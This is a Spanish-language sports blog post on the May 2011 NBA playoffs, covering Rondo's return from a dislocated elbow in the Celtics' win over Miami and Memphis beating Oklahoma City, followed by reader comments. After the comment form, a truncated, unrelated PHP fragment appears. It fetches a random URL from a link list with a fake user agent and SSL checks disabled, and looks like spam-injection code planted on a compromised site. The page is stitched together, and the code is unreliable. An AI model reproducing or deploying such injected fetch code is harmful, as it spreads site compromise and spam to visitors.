Playoffs(7/05/2011): El teatro de las pesadillas

08 de May de 2011 por TheDeerHunter

Regresamos al Boston Garden. La historia nos ha enseñado en tantas ocasiones sus dientes, su naturaleza terrible para el visitante, que cuesta creer que su efecto nos siga sorprendiendo. El viejo Leprechaun vuelve a hacer de las suyas como lleva haciendo la última mitad de siglo.
Anoche el “duende” se vistió de Rajon Rondo. A 7 minutos para el final del tercer cuarto, con el marcador igualado y los Celtics contra las cuerdas, Wade y Rondo caían al suelo y el base local se iba al vestuario con el codo izquierdo dislocado. Todo parecía perdido pero si algo nunca se puede esperar que hagan los Celtics es rendirse. Cerraron filas, apretaron dientes y desplegaron en esos 7 minutos el mejor nivel de juego de toda la serie, causando un efecto demoledor en la confianza de los Heat.
Por si fuera poco, al inicio del 4º Rondo volvía. Tampoco él se iba a rendir por quítame allá un codo dislocado.  Podéis imaginar cómo se caldeó el ambiente. Esa historia ya la conocemos.
Garnett se comió a Bosh, Pierce a LeBron y el viejo Big Three se impuso en esta ocasión al nuevo. Tras la victoria inapelable llueve un poco menos en Boston. Allí pocos piensan en otra posibilidad que no sea el 2-2 y apostar contra ello no parece muy buena idea. El Garden falla muy pocas veces. Por cierto, Shaq volvió.

Mientras en el Oeste los Grizzlies toman ventaja en una serie que tiene toda la pinta de que se resolverá tarde, on sudor y con sangre. Los Thunder se dejaron remontar 16 puntos en el último cuarto y lo perdieron todo en la prórroga tras un partido tosco, defensivo. 21 puntos y 21 rebotes (récord de la franquicia) por parte de Zach Randolph, más la actuación algo más gris que en otras ocasiones de Durant y Westbrook obraron el milagro. Extraordinaria aportación de Mayo desde el banco. Tras una regular convulsa está cuajando unos playoffs excelentes. Gran partido de Conley y también de Gasol. Intriga saber cual va a ser su precio.

MVP: El termómetro anímico de los Celtics los suelen ser Pierce y/o Garnett. Ayer el primero 27 puntos, 5 rebotes y 5 asistencias dejando a LeBron en un 6-16. El otro 28-18 abusando de un Chris Bosh muy empequeñecido. Rabia y orgullo verdes.

La sorpresa: Los Heat podrían haber salido ayer humillados. No lo fueron gracias al gran trabajo de Mario Chalmers y, como casi siempre, de Joel Anthony.

La decepción: Bosh estuvo lamentable sobre pasado por las circunstancias y por Garnett. 6 puntos (1 de 6 en tiro) y 5 rebotes no justifican su nómina. Tampoco es agradable ver a Bibby a este nivel. No metió ni una.

El mayor esfuerzo en vano: Ibaka también tuvo que retirarse lesionado para después volver… aunque su efecto no fue tan brutal como el de Rondo. Jugó 43 minutos arriesgando la salud; firmó 14 puntos, 8 rebotes y 6 tapones pero no le sirvió de mucho.

Comenta

10 comentarios a esta entrada

  1. Antoine Doinel dice:
    #1

    Epic night en el garden. Mejor incluso que aquel comeback de Pierce en 2008. Qué grande eres, Rondo!

    El cuarto partido puede ser impresionante. Los Heat deberían saber que si se ponen 2-2 y con Shaq la cosa se les va a poner complicada. Vamos a ver qué tiene Rondo y si puede volver en esta serie, porque con lo de ayer ya me espero cualquier cosa.
    Dudo bastante que a los Heat se les escape la serie, pero veamos como sigue Garnett y si Allen se enchufa.

    Los Grizzlies, con casta. Veo un séptimo partido aquí.

      Citar

  2. TheAnswer dice:
    #2

    Rondo, un brazo y tres co**nes.

      Citar

  3. Javijaen dice:
    #3

    El partido de los Celtics fue tan bueno por diversos factores:
    1. Garnett se merendó a Bosh y fue la clave principal de la victoria. A Bosh y a quien se le pusiera delante, y es que fue el mejor del partido de largo.
    2. A Pierce le va bien este ambiente, en cuanto vio un poco débil (de ganas o de todo) a Lebron se lo merendó él solito, y de paso metió canastas de todos los colores.
    3. El factor Rondo fue la puntilla. Pese a que el base no hizo un partido nada sobresaliente hasta su lesión, el volver a la cancha ganó el partido para su equipo.

    Ahora bien, un 2-1 y a tener en cuenta varias cosas:
    – En los dos últimos partidos, Wade ha podido por mucho con Allen, y que no engañen los números, ya que Ray llevaba 7 puntos casi hasta el final, donde Wade fue el “malo de la película” y su último cuarto y parte del tercero fueron para olvidar.
    – Bosh y Lebron es probable que sumen mucho más, por lo que un partido menos “caótico” le será más difícil ganar a Boston. Tampoco pienso que Bibby e Ilgauskas lo hagan tan mal siempre. Peor sí que es imposible.
    – Los banquillos siguen siendo ganados por Heat, ya que Anthony-Chalmers-Jones le siguen ganando la tostada a Davis-West-Green. Aún no tengo claro que Shaquille pueda volcar un partido a favor de Celtics el solo.

    Así que una eliminatoria apasionante en la que Celtics tendrá que seguir remando fuerte. Las espadas en todo lo alto.
    Por cierto, enhorabuena a Memphis, por lo menos no se dirá que vinieron de paseo, como la otra vez…

      Citar

  4. max dice:
    #4

    Lakers perdiendo de 25 ptos. mediado el tercer cuarto. Jason Terry les está haciendo un traje a medida. Vaya paliza para despedir la serie. Me voy a dormir pq esto ya no tiene arreglo!!

      Citar

  5. KB # 24 dice:
    #5

    ke pena k estan dando los lakers esta noche…

      Citar

  6. Denise dice:
    #6

    Pero…con los jugadores defensivos que tiene y con el supuestamente mejor coach en el banco..cómo se puede defender el perimetro tan mal? Si parece un concurso de triples…
    Total, que bye bye a Phil Jackson y en los proximos dias nos iremos entrerando de que ha pasado en el vestuario angelino porque esta debacle no se debe a aspectos deportivos, aqui huele a podrido y algo extradeportivo ha debido de pasar para que se hallan llevado este repaso y digan adios al threepeat que parecia que nadie se lo podia quitar, porque eran la mejor plantilla sin duda.

      Citar

  7. Pirata dice:
    #7

    Estoy contigo, aqui hay algo más seguro….

      Citar

  8. HeiNeKeN dice:
    #8

    De 40… lo de Terry es record de playoffs?? el 9 de 10 en triples… bueno y lo de Dallas en conjunto, 20 de 32 tampoco ira muy lejos…

      Citar

  9. Vader dice:
    #9

    Vaya repaso se han llevado los Lakers… a la media parte esto ya estaba acabado. A ver si nos explican que ha pasado aquí porque como bien decis huele a podrido.

    Supongo que con esta debacle más la salida de Phil este año puede que haya movimientos importantes en el roster de los Lakers. El único que veo intocable es a Kobe, ¿Iran a por Howard usando a Bynum, Gasol u Odom?

    Saludos

      Citar

  10. GreenPride dice:
    #10

    ¡¡¡¡¡Green Pride!!!!!! Vaya victoria de los verdes, realmente épica. Personalmente dudo mucho que los Celtics puedan ganar esta eliminatoria pero al contrario de lo que han hecho los Lakers con la suya no se rinden y están dispuestos a vender carísima su derrota aún a pesar de las lesiones que los acechan (Rondo con un brazo, Pierce tocado, Shaq no puede corre y no digamos saltar, Jermaine con la espalda regular). Y a pesar de todo se entregan a muerte y consiguen sacar el partido de la manera en la que lo han sacado. Para descubrirse los partidos de Garnett que arrasó a Bosh y de Pierce que por una vez le metió mano a LeBron. Veo difícil que se pueda repetir mucho la heroica pero bien harían los Heat en intentar no dar más vida a los de Boston si no quieren verse metidos en un lío de verdad. Interesantísimo cuarto partido sobre todo si los Celtics no pierden a ninguno de los tocados por lesiones. Por los Heat la derrota no es demasiado preocupante siempre y cuando no dejen a los Celtics creérselo. Bosh horrible y LeBron muy controlado, esta vez no pudieron poner el partido de su parte pero siguen pareciendo más frescos y sanos que los Celtics aunque harían bien en no subestimar el “corazón e campeón” de los Celtics

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>